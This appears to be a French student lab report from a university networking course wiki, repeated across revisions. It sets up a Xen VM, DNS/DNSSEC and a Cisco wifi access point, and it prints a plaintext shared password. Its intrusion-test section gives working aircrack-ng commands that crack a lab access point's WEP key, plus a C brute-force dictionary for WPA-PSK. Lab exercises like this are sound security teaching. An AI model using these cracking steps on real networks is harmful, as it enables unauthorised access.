 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
==== Configuration de la machine virtuelle ====&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
==== Configuration réseau ==== &lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à internet à ma machine virtuelle, je modifie le fichier suivant : &lt;br /&gt;
&lt;br /&gt;
/etc/networks/interfaces &lt;br /&gt;
&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 10.60.100.173/24&lt;br /&gt;
  up ip address add dev eth0 193.48.57.173/32 ; ip route add default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
  down ip address del dev eth0 193.48.57.173/32 ; ip route del default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Configuration ssh ==== &lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à ma machine virtuelle via ssh, je modifie le fichier suivant :&lt;br /&gt;
&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Relancer le service ssh :&lt;br /&gt;
&lt;br /&gt;
 service ssh restart&lt;br /&gt;
&lt;br /&gt;
Pour accéder à la machine virtuelle via ssh il faut desormais taper la commande suivante :&lt;br /&gt;
 ssh@193.48.57.173&lt;br /&gt;
&lt;br /&gt;
==== Configuration DNS ====&lt;br /&gt;
&lt;br /&gt;
- Achat du nom de domaine via gandi.net : toad59.site&lt;br /&gt;
&lt;br /&gt;
- Associer le nom de domaine à l'adresse ip dans gandi, dans l'onglet Glue Records --&amp;gt; Add&lt;br /&gt;
&lt;br /&gt;
- Dans l'onglet Nameserver, sélectionner change puis :&lt;br /&gt;
Nameserver1 : ns.toad59.site&lt;br /&gt;
Nameserver2 : ns.gandi6.net&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier '''/etc/bind/named.conf.options''', qui gère les options de configuration du DNS :&lt;br /&gt;
 options {&lt;br /&gt;
         directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
         #dnssec-validation auto;&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
         217.70.177.40/32;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier de configuration '''/etc/bind/db.toad59.site''' &lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 @ IN SOA ns.toad59.site. postmaster.toad59.site. (&lt;br /&gt;
       1               ; Version&lt;br /&gt;
       1800             ; Refresh (30m)&lt;br /&gt;
       600             ; Retry   (10m)&lt;br /&gt;
       3600             ; Expire (1h)&lt;br /&gt;
       3600 )           ; Minimum TTL (1h)&lt;br /&gt;
 @ IN NS ns.toad59.site.&lt;br /&gt;
 @ IN NS ns6.gandi.net.&lt;br /&gt;
 ns      IN A       193.48.57.173&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier '''/etc/bind/named.conf.local''' pour déclarer les zones associées au domaine : &lt;br /&gt;
 zone &amp;quot;toad59.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;etc/bind/db.toad59.site&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du site web ====&lt;br /&gt;
&lt;br /&gt;
Il existe plusieurs façon de sécuriser le site web. Je choisis la méthode par mail.&lt;br /&gt;
&lt;br /&gt;
- Créer une adresse mail via gandi.net, onglet Email : admin@toad59.site&lt;br /&gt;
&lt;br /&gt;
- Accéder à l'adresse mail pour constater que le certificat a été reçu.&lt;br /&gt;
&lt;br /&gt;
- Obtention d'un certificat via OpenSSL :&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout toad59.site.key -out toad59.site.csr&lt;br /&gt;
&lt;br /&gt;
Dans le champ common name, il est important de saisir : toad59.site&lt;br /&gt;
&lt;br /&gt;
- Acheter un certificat clé pour se connecter de façon sécurisée sur Gandi en passant par la rubrique Cerificat SSL.csr, généré à l'étape précédente.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
Il faut à présent sécuriser le serveur DNS en signant la zone correspondant à mon nom de domaine.&lt;br /&gt;
&lt;br /&gt;
- Dé-commenter la ligne suivante dans le fichier '''named.conf.options''' :&lt;br /&gt;
 dnssec-enable yes&lt;br /&gt;
&lt;br /&gt;
- Créer un repertoire '''toad59.space.dnssec''' pour y génerer des clefs :&lt;br /&gt;
&lt;br /&gt;
'''La clé asymétrique de signature de clefs de zone'''&lt;br /&gt;
 dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE toad59.site&lt;br /&gt;
&lt;br /&gt;
'''La clé asymétrique de zone pour les enregistrements '''&lt;br /&gt;
 dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE toad59.site&lt;br /&gt;
&lt;br /&gt;
- Renommer les clefs :&lt;br /&gt;
 mv Ktoad59.site.+005+26968.key toad59.site-ksk.key&lt;br /&gt;
 mv Ktoad59.site.+005+26968.private toad59.site-ksk.private&lt;br /&gt;
 mv Ktoad59.site.+005+27570.key toad59.site-zsk.key&lt;br /&gt;
 mv Ktoad59.site.+005+27570.private toad59.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
- Inclure les clefs publiques dans dans le fichier db.toad59.site&lt;br /&gt;
 $include /etc/bind/lulya.space.dnssec/toad59.site-ksk.key&lt;br /&gt;
 $include /etc/bind/lulya.space.dnssec/toad59.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
- Signer les enregistrements à partir du répertoire '''toad59.space.dnssec'''&lt;br /&gt;
 dnssec-signzone -o toad59.site -k toad59.site-ksk  ../db.toad59.site toad59.site-zsk&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès WiFi ====&lt;br /&gt;
- Brancher une clef wifi sur le PC&lt;br /&gt;
&lt;br /&gt;
- Installer le paquet aircrack.ng&lt;br /&gt;
&lt;br /&gt;
- On peut lister les interfaces disponibles, en activant le mode moniteur de la carte réseau :&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
- Passer la carte WiFi en mode moniteur, espion du réseau sans fil :&lt;br /&gt;
 airmon-ng start wlan0mon &lt;br /&gt;
wlan0mon est le nouveau nom de la carte réseau donné par défaut car le précédent est considéré comme trop long par la machine.&lt;br /&gt;
&lt;br /&gt;
- Obtenir les trames WiFi sur tous les canaux :&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
- Noter le SSID de la machine à attaquer, ici cracotte03 : '''04:DA:D2:9C:50:53'''&lt;br /&gt;
&lt;br /&gt;
- Visulaiser les informations de cracotte03 : &lt;br /&gt;
 airodump-ng --channel 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
- Récupérer dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte03 :&lt;br /&gt;
 airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
J'attends qu'il y ai environ 30 000 trames de volées, ce processus prend un peu de temps.&lt;br /&gt;
&lt;br /&gt;
- Lancer le décryptage de la clef WEP : &lt;br /&gt;
 aircrack-ng lcrack-03.cap&lt;br /&gt;
Résultat :&lt;br /&gt;
  &lt;br /&gt;
                                                                        [00:00:00] Tested 813 keys (got 74481 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 17   F1(96512) E7(85504) BD(84992) 6F(84736) F2(83968) FA(83712) 12(83456) 0E(82688) C8(82176) 6A(81920) 70(81664) 11(81408) 95(81408) E9(81408) 75(81152) &lt;br /&gt;
    1    0/  1   8E(105472) 34(86016) B3(84480) 54(84224) 2A(83456) B9(83456) 87(82688) 06(82432) 64(82432) 65(82176) 21(81920) 8D(81664) 61(81408) 2F(81152) 3C(81152) &lt;br /&gt;
    2    5/  2   7E(83968) 0E(82432) BF(82432) A2(82176) 0A(81920) 9C(81920) A8(81664) DF(81664) E2(81664) A7(81408) B4(81408) 33(80896) 58(80896) 90(80640) 16(80384) &lt;br /&gt;
    3   17/  3   5B(80896) B2(80640) 5A(80384) B1(80384) C4(80384) F6(79616) 03(79360) 33(79360) DA(79360) 73(79104) 9E(79104) 30(78848) 86(78848) AD(78848) D6(78848) &lt;br /&gt;
    4    0/  1   71(107008) 8D(86528) 03(83712) 7A(83712) 5E(83200) AF(82944) 50(82688) CF(82688) 54(82432) C0(82432) 21(82176) BE(81920) CB(81920) 1A(81664) B5(81408) &lt;br /&gt;
        KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:09:99:99:99 ] &lt;br /&gt;
        Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
On constate que 813 clef ont été testées avant de trouver la bonne.&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK ====&lt;br /&gt;
&lt;br /&gt;
- Visualiser les interfaces&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
- Noter le SSID de la machine à attaquer :&lt;br /&gt;
 44:AD:D9:5F:87:02  -40        3        0    0   8  54e. WPA2 CCMP   PSK  kracotte03 &lt;br /&gt;
&lt;br /&gt;
- Coder un &amp;quot;dictionnaire&amp;quot; en C. On suppose que la clef WPA est un code de 8 chiffres :&lt;br /&gt;
 vim dico.c&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 int main(void){&lt;br /&gt;
        int x = 0;&lt;br /&gt;
        for(x=0; x&amp;lt;=99999999; x++){&lt;br /&gt;
                 printf(&amp;quot;%08d\n&amp;quot;,x);&lt;br /&gt;
        }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
- Compiler dico.c :&lt;br /&gt;
 gcc -Wall dico.c&lt;br /&gt;
&lt;br /&gt;
- Executer dico.c :&lt;br /&gt;
 ./a.out | more&lt;br /&gt;
&lt;br /&gt;
- Enregistrer le résultat du code dans un fichier txt :&lt;br /&gt;
 ./a.out &amp;gt; dico.txt&lt;br /&gt;
&lt;br /&gt;
- Lancer le traitement de lcrack-03 par dico.txt :&lt;br /&gt;
 aircrack-ng -w dico.txt lcrack-03&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56410</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56410"/>
				<updated>2021-11-19T11:34:08Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Sécurisation du serveur DNS par DNSSEC */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Connexion sur le disque de virtualisation ====&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
==== Configuration de la machine virtuelle ====&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
==== Configuration réseau ==== &lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à internet à ma machine virtuelle, je modifie le fichier suivant : &lt;br /&gt;
&lt;br /&gt;
/etc/networks/interfaces &lt;br /&gt;
&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 10.60.100.173/24&lt;br /&gt;
  up ip address add dev eth0 193.48.57.173/32 ; ip route add default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
  down ip address del dev eth0 193.48.57.173/32 ; ip route del default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Configuration ssh ==== &lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à ma machine virtuelle via ssh, je modifie le fichier suivant :&lt;br /&gt;
&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Relancer le service ssh :&lt;br /&gt;
&lt;br /&gt;
 service ssh restart&lt;br /&gt;
&lt;br /&gt;
Pour accéder à la machine virtuelle via ssh il faut desormais taper la commande suivante :&lt;br /&gt;
 ssh@193.48.57.173&lt;br /&gt;
&lt;br /&gt;
==== Configuration DNS ====&lt;br /&gt;
&lt;br /&gt;
- Achat du nom de domaine via gandi.net : toad59.site&lt;br /&gt;
&lt;br /&gt;
- Associer le nom de domaine à l'adresse ip dans gandi, dans l'onglet Glue Records --&amp;gt; Add&lt;br /&gt;
&lt;br /&gt;
- Dans l'onglet Nameserver, sélectionner change puis :&lt;br /&gt;
Nameserver1 : ns.toad59.site&lt;br /&gt;
Nameserver2 : ns.gandi6.net&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier '''/etc/bind/named.conf.options''', qui gère les options de configuration du DNS :&lt;br /&gt;
 options {&lt;br /&gt;
         directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
         #dnssec-validation auto;&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
         217.70.177.40/32;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier de configuration '''/etc/bind/db.toad59.site''' &lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 @ IN SOA ns.toad59.site. postmaster.toad59.site. (&lt;br /&gt;
       1               ; Version&lt;br /&gt;
       1800             ; Refresh (30m)&lt;br /&gt;
       600             ; Retry   (10m)&lt;br /&gt;
       3600             ; Expire (1h)&lt;br /&gt;
       3600 )           ; Minimum TTL (1h)&lt;br /&gt;
 @ IN NS ns.toad59.site.&lt;br /&gt;
 @ IN NS ns6.gandi.net.&lt;br /&gt;
 ns      IN A       193.48.57.173&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier '''/etc/bind/named.conf.local''' pour déclarer les zones associées au domaine : &lt;br /&gt;
 zone &amp;quot;toad59.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;etc/bind/db.toad59.site&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du site web ====&lt;br /&gt;
&lt;br /&gt;
Il existe plusieurs façon de sécuriser le site web. Je choisis la méthode par mail.&lt;br /&gt;
&lt;br /&gt;
- Créer une adresse mail via gandi.net, onglet Email : admin@toad59.site&lt;br /&gt;
&lt;br /&gt;
- Accéder à l'adresse mail pour constater que le certificat a été reçu.&lt;br /&gt;
&lt;br /&gt;
- Obtention d'un certificat via OpenSSL :&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout toad59.site.key -out toad59.site.csr&lt;br /&gt;
&lt;br /&gt;
Dans le champ common name, il est important de saisir : toad59.site&lt;br /&gt;
&lt;br /&gt;
- Acheter un certificat clé pour se connecter de façon sécurisée sur Gandi en passant par la rubrique Cerificat SSL.csr, généré à l'étape précédente.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
Il faut à présent sécuriser le serveur DNS en signant la zone correspondant à mon nom de domaine.&lt;br /&gt;
&lt;br /&gt;
- Dé-commenter la ligne suivante dans le fichier '''named.conf.options''' :&lt;br /&gt;
 dnssec-enable yes&lt;br /&gt;
&lt;br /&gt;
- Créer un repertoire toad59.space.dnssec pour y génerer des clefs :&lt;br /&gt;
&lt;br /&gt;
'''La clé asymétrique de signature de clefs de zone'''&lt;br /&gt;
 dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE toad59.site&lt;br /&gt;
&lt;br /&gt;
'''La clé asymétrique de zone pour les enregistrements '''&lt;br /&gt;
 dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE toad59.site&lt;br /&gt;
&lt;br /&gt;
- Renommer les clefs :&lt;br /&gt;
 mv Ktoad59.site.+005+26968.key toad59.site-ksk.key&lt;br /&gt;
 mv Ktoad59.site.+005+26968.private toad59.site-ksk.private&lt;br /&gt;
 mv Ktoad59.site.+005+27570.key toad59.site-zsk.key&lt;br /&gt;
 mv Ktoad59.site.+005+27570.private toad59.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
